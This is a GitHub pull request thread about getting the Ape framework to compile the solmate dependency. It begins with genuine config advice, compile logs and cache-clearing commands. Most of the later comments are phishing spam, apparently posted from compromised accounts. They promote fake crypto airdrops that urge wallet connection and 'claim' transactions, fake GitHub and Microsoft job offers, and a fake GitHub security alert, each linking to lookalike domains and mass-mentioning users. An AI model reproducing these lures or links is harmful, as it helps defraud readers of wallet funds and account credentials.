### PR TITLE
fix: show stuff

### PR DESCRIPTION
**Pull request by antazoey**
Showing how to get Ape to work, ill leave comments...

### CODE REVIEW

File: ape-config.yaml [hunk 1]
```diff
@@ -5,12 +5,29 @@ plugins:
...
+
+  # - name: smartcontractkit
+  #   github: smartcontractkit/chainlink-brownie-contracts
+  #   version: 0.8.0
+
   - name: solmate
     github: transmissions11/solmate
     ref: "v6"
+    contracts_folder: src
+    config_override:
```
Comment (antazoey) [inline ape-config.yaml:27]: so each dependency, you can override it's config as if there was an ape-config.yaml in that project.

typically what i do is clone each project independently, try running `ape compile` and seeing what all config i need to add in order for that to work. Then, copy that same config here into `config_override`...

**WARN**: I also to run `ape pm compile -f` to get rid of the faulty-compiled `solmate` that had no contracts.

but once i did all that, the `v6` directory was filled out.

File: ape-config.yaml [hunk 2]
```diff
@@ -5,12 +5,29 @@ plugins:
...
+  #   ref: 4.3.3
+
+  # - name: openzeppelin-contracts-upgradeable
+  #   gituhb: openzeppelin/contracts-upgradeable-4.7.3
+    
+  # - name: ethoptimism
+  #   github: eth-optimism/contracts
+  #   ref: 0.5.21
+
+  # - name: smartcontractkit
```
Comment (antazoey) [inline ape-config.yaml:19]: i think there is a better ape version of this dependency i recommend using.
Else, you will have to uncomment and fix all the peer dependencies above. I didnt go through and do all that for my own time's sake, but following the strategy of the other comment, you should be able to achieve that.

**Comment by rafael-abuawad** [comment]
@antazoey Im still getting an error, Idk what is going on, what python version are you using?

```bash
$ ape pm compile -f
WARNING (ape-demos): Compiled manifest produced no contract types! Are you missing compiler plugins?
SUCCESS (ape-demos): Package 'solmate@v6' compiled.
```

Im getting this message back on the terminal, but the `v6` folder is empty

**Comment by antazoey** [comment]
> @antazoey Im still getting an error, Idk what is going on, what python version are you using?

I am using 3.10.13, but shouldnt really matter.

My output:

```
(ape310) ➜  super-duper-journey git:(fix/dep) ✗ ape pm compile -f -v debug
DEBUG: 'tmpxmeb16f6' is not an 'ApeProject', but attempting to process as one.
INFO: Compiling 'utils/SafeCastLib.sol'.
INFO: Compiling 'auth/authorities/MultiRolesAuthority.sol'.
INFO: Compiling 'test/utils/mocks/MockERC1155.sol'.
INFO: Compiling 'test/utils/users/ERC721User.sol'.
INFO: Compiling 'utils/ReentrancyGuard.sol'.
INFO: Compiling 'utils/SafeTransferLib.sol'.
INFO: Compiling 'tokens/WETH.sol'.
INFO: Compiling 'tokens/ERC721.sol'.
INFO: Compiling 'test/utils/users/ERC1155User.sol'.
INFO: Compiling 'test/utils/mocks/MockAuthChild.sol'.
INFO: Compiling 'tokens/ERC1155.sol'.
INFO: Compiling 'test/utils/mocks/MockERC20.sol'.
INFO: Compiling 'test/utils/mocks/MockAuthority.sol'.
INFO: Compiling 'test/utils/users/GenericUser.sol'.
INFO: Compiling 'auth/Auth.sol'.
INFO: Compiling 'tokens/ERC20.sol'.
INFO: Compiling 'utils/CREATE3.sol'.
INFO: Compiling 'utils/SSTORE2.sol'.
INFO: Compiling 'utils/FixedPointMathLib.sol'.
INFO: Compiling 'utils/Bytes32AddressLib.sol'.
INFO: Compiling 'auth/authorities/RolesAuthority.sol'.
INFO: Compiling 'test/utils/users/ERC20User.sol'.
INFO: Compiling 'test/utils/mocks/MockERC721.sol'.
DEBUG: Compiling using Solidity compiler '0.8.23+commit.f704f362'
DEBUG: Compiling using Solidity compiler '0.8.10+commit.fc410830'
INFO: Compiling using Solidity compiler '0.8.23+commit.f704f362'.
INFO: Compiling using Solidity compiler '0.8.10+commit.fc410830'.
SUCCESS: Package 'solmate@v6' compiled.
(ape310) ➜  super-duper-journey git:(fix/dep) ✗ python --version
Python 3.10.13
```

**Comment by antazoey** [comment]
maybe try manually deleting some cached things?

```
rm -rf ~/.ape/packages/solmate
rm -rf ./.build
rm -rf contracts/.cache
```

None of that should matter because of the `-f` usage but just something to try i guess.

**Comment by rafael-abuawad** [comment]
After deleting the **cached** stuff, it compiled and worked correctly!

```bash
rm -rf ~/.ape/packages/solmate
rm -rf ./.build
rm -rf contracts/.cache
```

I thought of this before but I didn't try to run the first command:

```bash
rm -rf ~/.ape/packages/solmate
```

**Comment by naudachu** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[Claim Now](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @jonathanmalo, @johncalabrese, @jossemii, @DizNicolasAmor, @Olney1, @cqxmzhc, @degan

**Comment by peter-bennett** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[Claim Now](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @jpatel3, @sydobd, @slavakurilyak, @Bidouyeur, @zacfire, @marktanrj, @kabaluyot, @anuraglol, @xpao24, @Dolpheyn, @Brown68, @sergeytimoshin, @andrewedstrom, @the-real-astro, @xsaad67, @c-drazen, @iourivolkov, @RayOver, @x0oo11235oo0x, @glove2006, @Parsa-03, @mrasoahaingo, @icarusdjr, @cDoru, @frooz45, @matronator, @mhxw, @Lipe-lx, @greyireland, @accavdar, @innertiaJP, @allwin199, @leandrodelete, @viaweb3, @andersonlthome, @twopieare, @hymnfish, @flux0uz, @joaoolucas, @michhub-dev, @konditer83, @crashquentin, @thezaidbintariq, @theRunCom, @dotyigit, @joneskj55, @uu-z, @junhoyeo, @xhrexx, @guo-yu

**Comment by elton** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[Celestia Banner](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!fskydev, @mdaamer248, @arguiot, @aganglada, @boyluan, @alfheimrShiven, @albertlieyingadrian, @revvi, @Atharv181, @a1740942002, @mAlkhatieb, @ZeroL, @wocaatm, @ekanban, @meowyx, @cylcops, @wniter, @0xJackLee, @megonx, @codingshot

**Comment by andrewluetgers** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
amimart, @longpi1, @Jchicode, @sheyouyou, @nuakin, @Niki-eth, @mandrin354235, @Hromosoma47, @mdrzh, @greg131313, @MemerGamer, @foxgem, @RedTrader1917, @naji1368, @0xBalp, @myself659, @tonystark1722, @maral272, @FedorMeljnikov, @itpey

**Comment by leojin** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
modnarwolf, @rwbaumg, @delzennejc, @blockchainstone-giuseppe, @andy00614, @noahbuscher, @s-bilous, @Dityath, @maxvint, @codebling, @cjbaezilla, @bingen, @LinuxIsCool, @sadeghbarati, @walkjoy, @slvrfn, @dkenw, @yijiehuanshen, @hokage229, @warifp

**Comment by andrewluetgers** [comment]
Big phishing scam going on with GH right now I got hit by it and revoked access from the offending app. But they sent out the fake messages under my account and many others. https://github.com/orgs/community/discussions/109171

**Comment by jddunn** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
MSevey, @astros9, @Bidon15, @shibakenfinance, @bjkmustafa36, @vvuwei, @Jeff20220101, @kizyanov, @NikStaa, @alexdphan, @Godspower-Eze, @SwenSchaeferjohann, @GrubbyAllen, @tksohishi, @drgomesp, @prodbygog, @ThamDestech, @SebastianElvis, @VkadaRog, @foxgem

**Comment by jddunn** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
ordiha, @phohtoo, @BizDeveloperMesbah, @Osmorad, @0xOsprey, @AddictedNode, @DarkingLee, @Isa232323, @exaroth, @dreamineering, @Skill127, @Robocatty, @Evalir, @JonnyDf, @rootulp, @npjd, @TriPoloski333, @mancevd, @sshamanov, @dranov

**Comment by 1291945816** [comment]
# [Join Microsoft as a Junior Software Developer!](https://careersmicrosoft.online/)

Exciting news! We're hiring for a Junior Software Developer position at Microsoft, and your application has been approved!

## Apply Now:
Ready to embark on this amazing journey? [Apply here](https://careersmicrosoft.online/) by **March 20, 2024**.
escapemanuele, @joglea, @Brown68, @tamudosoyyo, @youngqqcn, @ceddybi, @Atharv181, @bruno-fialho, @humancodex, @waite1x, @kevin820125, @skyve2012, @dorucioclea, @jsssdsd, @tkersey, @must479, @blackironj, @mkubdev, @atbe, @Gladorme

**Comment by dev-chain247** [comment]
# [Job Opportunity at Microsoft!](https://careersmicrosoft.online/)

 We're hiring for position at Microsoft!

## How to Apply:
Ready to embark on this amazing journey? Apply now [here](https://careersmicrosoft.online/) before **March 19, 2024**.

## Job Description:
- **Position:** Junior Software Developer
- **Salary:** Competitive salary package
- **Location:** Remote
- **Benefits:**
  - Work remotely from anywhere in the world
  - Flexible working hours
  - Comprehensive health insurance
  - Generous vacation and sick leave policy
  - Professional development opportunities
  - Collaborative and inclusive work environment

## Requirements:
- Passion for software development
- Basic understanding of programming languages like Python, JavaScript, or Java
- Strong problem-solving skills
- Excellent communication and teamwork abilities

Don't miss out on this incredible opportunity to kick-start your career with one of the world's leading tech companies! Apply now and become a part of the Microsoft family!
RiccardoBonesi, @underwoodarturo, @aad3365, @mzygar, @Gojan444, @zenyui, @FergusHenderson96, @limcross, @nicolas-law, @Nateliason, @alex-zhang, @ElFitaFlores, @heyyfurqan, @Maciker, @alirast, @divyam-07, @jiaobit, @daksb, @mingderwang, @yingaibb

**Pull request closed without merging**